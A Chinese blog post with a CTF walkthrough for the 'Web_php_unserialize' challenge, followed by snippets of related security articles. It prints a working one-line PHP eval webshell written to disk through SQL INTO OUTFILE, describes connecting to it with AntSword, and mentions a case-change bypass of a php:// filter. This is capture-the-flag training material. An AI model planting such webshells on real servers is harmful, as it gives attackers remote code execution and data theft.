CTF Web_php_unserialize 详细解题过程

已于 2022-06-11 10:10:54 修改
阅读量3.2k 收藏 2
点赞数 3
文章标签: web安全
于 2022-04-16 00:18:44 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63028223/article/details/124206603
版权
本文介绍了如何通过dirb工具进行网站敏感文件扫描,发现并利用SQL注入漏洞,创建一句话木马,并使用中国蚁剑进行远程控制。成功获取数据库中的flag,还展示了绕过大小写过滤的payload构造方法,揭示了网站安全防护的重要性。
摘要由CSDN通过智能技术生成

打开靶场地址,我们看到是一个php代码

我们首先利用kali虚拟机内的dirb,获取敏感信息,扫描网站敏感文件

扫描可以得出该网站下的文件,我将它复制在记事本中

发现一个数据库网站

获取到账号为root密码为空

登录数据库,在SQL出编写一句话木马,并执行。

SELECT "<?php eval(@$_POST['pass']); ?>"
INTO OUTFILE '/tmp/test1.php'

接下来我们使用中国蚁剑,链接我们所编写的木马,

SELECT "<?php eval(@$_POST['pass']); ?>"
INTO OUTFILE '/tmp/test1.php'

//红色字体为链接密码,绿色字体为木马文件路径。

链接成功后,我们可以直接在蚁剑中,查看该数据库中的文件,发现flag

第二种方法:

根据题目源代码可知 过滤了 php:// 大小写绕过呗

构造 payload,抓包

在数据包中添加一个PHP的函数

 

 

然后cat flag那个文件,查看内容:

拿到flg............ 

一个番茄锅
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全 | CTF】攻防世界 Web_php_unserialize 解题详析
等风来
05-28 3688
这段代码接收参数 var,使用 base64_decode 函数对 var 进行解码,然后通过 preg_match 函数判断是否包含类似 o:2的字符串,如果存在则中断程序执行,否则调用 @unserialize 函数进行反序列化操作。这段代码首先定义了一个名为 Demo 的类,包含了一个私有变量 $file 和三个魔术方法 __construct()、__destruct() 和 __wakeup()。3、private在变量名前添加标记\00(classname)\00,长度+2+类名长度,如。
“微软蓝屏”事件暴露了网络安全哪些问题?
2302_80152430的博客
08-03 455
例如,电力系统的故障会波及到依赖电力的通信网络和制造业,而医疗设备的故障则直接影响到患者的健康和生命安全。因此,技术领域需要不断完善系统的韧性,加强风险管理和质量控制机制,确保系统的稳定性和安全性。随着信息技术的普及,公众对网络和服务中断的容忍度越来越低,这就要求各行各业不仅要保障自身系统的稳定运行,还要加强与客户的沟通和透明度。4. 自动化测试与持续集成:使用自动化测试工具,定期运行测试用例,提高测试效率和覆盖率,同时实施持续集成策略,确保每次代码变更都经过自动化的构建和测试。
CCIA2024“网络安全优秀创新成果大赛-哈尔滨分站赛”优胜奖,花落谁家?
weixin_55163056的博客
08-06 208
开源网安代码审核平台CodeSec荣获“2024年网络安全优秀创新成果大赛哈尔滨分站赛”优胜奖
【网络安全】探索AI 聊天机器人工作流程实现RCE
等风来
08-06 42
我发现了一个广泛使用的AI聊天机器人平台中的远程代码执行漏洞。该漏洞存在于聊天机器人的自定义工作流响应代码中,这些工作流允许开发人员通过创建定制的流程来扩展机器人的功能。
《密码编码学与网络安全原理与实践》第四章第六章第七章 对称加密体制
m0_57291352的博客
08-06 485
对称加密包括分组密码和流密码分组密码:信息被分块(block)进行加密和解密,连续的明文元素使用相同的密钥K来加密,密文C=c1c2…=EK(m1)EK(m2)…C =c_1c_2…=E_K(m_1)E_K(m_2)…C=c1​c2​…=EK​(m1​)EK​(m2​)…。分组密码可以看作是一个字符长度很大代换——如64比特或更多。大部分的分组对称密码都基于Feistel结构。可逆变换是必要条件。设计”安全”的密码算法不难,只要使用足够多的轮数就可以,但降低速度,因此所有问题就是平衡问题。流密码:流密码中按
深度剖析网络安全挑战与应对策略
执笔写JAVA
08-03 772
“微软蓝屏”事件是由一次微软视窗系统软件更新引发的全球性网络安全事件,导致近850万台设备遭遇故障,波及多个关键行业,造成重大影响。本文从软件更新流程的风险管理和质量控制、预防大规模故障的最佳方案与应急响应对策,以及跨领域连锁反应的行业影响与应对三个方向,深入剖析了该事件所暴露的网络安全问题。文章指出,该事件凸显了软件更新流程中风险管理、质量控制、应急响应机制的不足,以及跨领域合作的重要性。为应对类似挑战,文章提出了加强风险管理、质量控制、应急响应和跨领域合作等全面应对策略。
企业产品网络安全日志0806
KD的疯狂实验室
08-06 136
默认 method,查询字符串 等会被屏蔽,你在日志中是找不到的。应该是为了隐私安全。启用方式依然是WAF面板配置日志CloudTrail的地方去掉你希望显示的所有共4个✓。采样:每一条WAF规则都会产生一个采样默认。你觉得是一个WAF,如果你有20条规则,到日志里就是20倍的量了。后果是:CloudTrail里数据量会暴增。特别是PutEvent的费用。
自学黑客(网络安全
2301_77160226的博客
08-05 2658
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全第一次作业(ubuntuan安装nginx以及php部署 and sql注入(less01-08)))
Sesessep的博客
08-06 408
1.安装依赖包2.安装nginx到https://nginx.org/en/download.html下载nginx之后将压缩包通过xtfp传输到ubuntu的/usr/local/nginx目录下3.查看编译环境是否有缺失4.编译5.启动nginx6.访问nginx7.增加php源地址8.安装php9.修改监听端口10.启动php-fpm,查看9000端口状况11.测试。
网络安全之不同阶段攻防手段(四)
子非渔
07-25 1041
前面已经说过信息收集、扫描探测以及初始访问阶段的攻防手段,下面将说一下在攻击者获取到访问权限的情况下会接着如何进一步在网络中建立控制点、提权、横移以及完成攻击后的遗迹隐藏
web安全基础学习
m0_71332744的博客
07-31 478
记录学习的原理,少有实操持续更新
医疗器械如何进行网络安全评估?
网 安 云
08-06 273
请注意,以上流程是一个概括性的描述,具体的评估流程可能会因不同的评估机构、法规要求和产品特性而有所差异。在实际操作中,应根据具体情况进行适当调整。组建评估团队:组建由网络安全专家、医疗设备专家、临床专家等组成的评估团队,确保评估工作的专业性和全面性。明确评估范围:首先,需要明确网络安全评估的具体范围,包括哪些医疗器械、哪些系统或模块、哪些网络组件等。定期评估:定期对医疗器械的网络安全进行评估和审计,及时发现并处理新的安全威胁和漏洞。评估风险:根据威胁的严重性和脆弱性的可利用性,评估医疗器械面临的风险等级。
网络安全之sql靶场(11-23)
huizhaohaha的博客
08-06 707
这一关查看源码后发现,username不能进行注入了,但是password依然可以进行注入,但是这就有一个前提条件就是username必须输入正确。看来我猜测是没错,那么接下来就是把payload语句进行base64编码后在进行注入,这里不得不说burpsuite的优势了,自带编码模块(感觉挺爽得啦),payload放下面啦,自己进行编码吧。这一关经过测试感觉和之前的有些区别啦,这时候我分析源码后发现注入点在user-agent上,所以我们可以试着抓包进行注入(使用抓包工具burpsuite进行抓包)
网络安全知识核心20要点
2401_84488651的博客
08-06 841
攻击者在 HTTP 请求中注入恶意的 SQL 代码,服务器使用参数构建数据库 SQL 命令时,恶意SQL 被一起构造,并在数据库中执行。
深度探索:LLaMa-3网络安全能力全解析
OpenCompass的博客
08-05 859
随着人工智能技术的迅速发展,大模型在处理各种复杂任务中展示出了卓越的能力。特别是在网络安全领域,大模型的应用潜力巨大,它们可以帮助自动化处理大量数据、识别潜在威胁和提供安全建议。然而,新型大模型层出不穷,要有效利用这些模型,首先必须验证它们在理解和处理网络安全相关问题上的能力。
网络安全应急响应概述
黑战士的博客
08-06 250
针对不同的事件类型对事件相关人员进行访谈,了解事件发生的大致情况及涉及的网络、主机等基本信息。制定相关的应急方案和策略后对相关的主机进行排查,一般会从系统排查、进程排查、服务排查、文件痕迹排查、日志分析等方面进行。网络安全应急响应是指针对已经发生或可能发生的安全事件进行监控、分析、协调、处理,以保护资产安全。该方法将应急响应流程分成准备阶段、检测阶段、抑制阶段、根除阶段、恢复阶段和总结阶段。巧妇难为无米之炊,应急响应有一个前提,那就是我们能够发现入侵行为的发生以及我们保留了入侵行为的日志等文件。
哈尔滨等保测评——为工业网络安全保驾护航新航标
weixin_62641226的博客
08-06 198
在这样的大环境下,以“安全第一关”的身份认证为基础,保障了科技创新和数据安全的同步发展,为企业的健康发展提供了坚实的保障。展望今后,哈尔滨还将在工业互联网安全方面不断深入,以“等保”测试为新的“灯塔”,不断推进科技创新和安全实践的深度结合,为实现“工业智能转型”打下坚实的基础,开创了“冰城”网络安全新时代。从系统漏洞检测、风险评估、安全政策审查、紧急应对演习,等保测试就像是一名有经验的舰长,为工业互联网这艘大船提供了准确的航向,规避了所有可能存在的安全隐患,保证了航行的安全性。🌐【工业互联,安全先行】🌐。
CBK-D4-通信与网络安全、访问控制
最新发布
sdyu_peter的博客
08-06 487
CBK-D4-通信与网络安全、访问控制.md
网络安全(黑客)—自学手册
dexi113的博客
08-05 854
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。
ctf Web_php_include
08-28
CTF(Capture The Flag)是一种网络安全竞赛,其中参与者需要解决各种与网络安全相关的问题。"Web_php_include" 是一个问题的提示,暗示了一个与 PHP 文件包含漏洞相关的 CTF 题目。 PHP 文件包含漏洞是一种常见的 Web 安全漏洞,它允许攻击者通过构造恶意请求来包含并执行服务器上的任意文件。攻击者可以利用这个漏洞来读取敏感文件、执行任意代码以及获取服务器权限。 在 CTF 中,解决 "Web_php_include" 题目的步骤通常如下: 1. 探测漏洞点:通过发送不同的请求,观察是否存在 PHP 文件包含漏洞。 2. 利用漏洞点:构造特定的请求,使得服务器执行恶意代码或读取敏感文件。 3. 获取目标:根据题目要求,尝试获取相应的 flag 或其他标识符。 4. 提交答案:将 flag 或其他标识符提交给比赛组织者验证。 请注意,在实际应用开发中,要避免 PHP 文件包含漏洞,可以使用安全的文件包含函数(如 require_once 或 include_once)、限制包含路径、以及对用户输入进行严格过滤和验证等安全措施。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值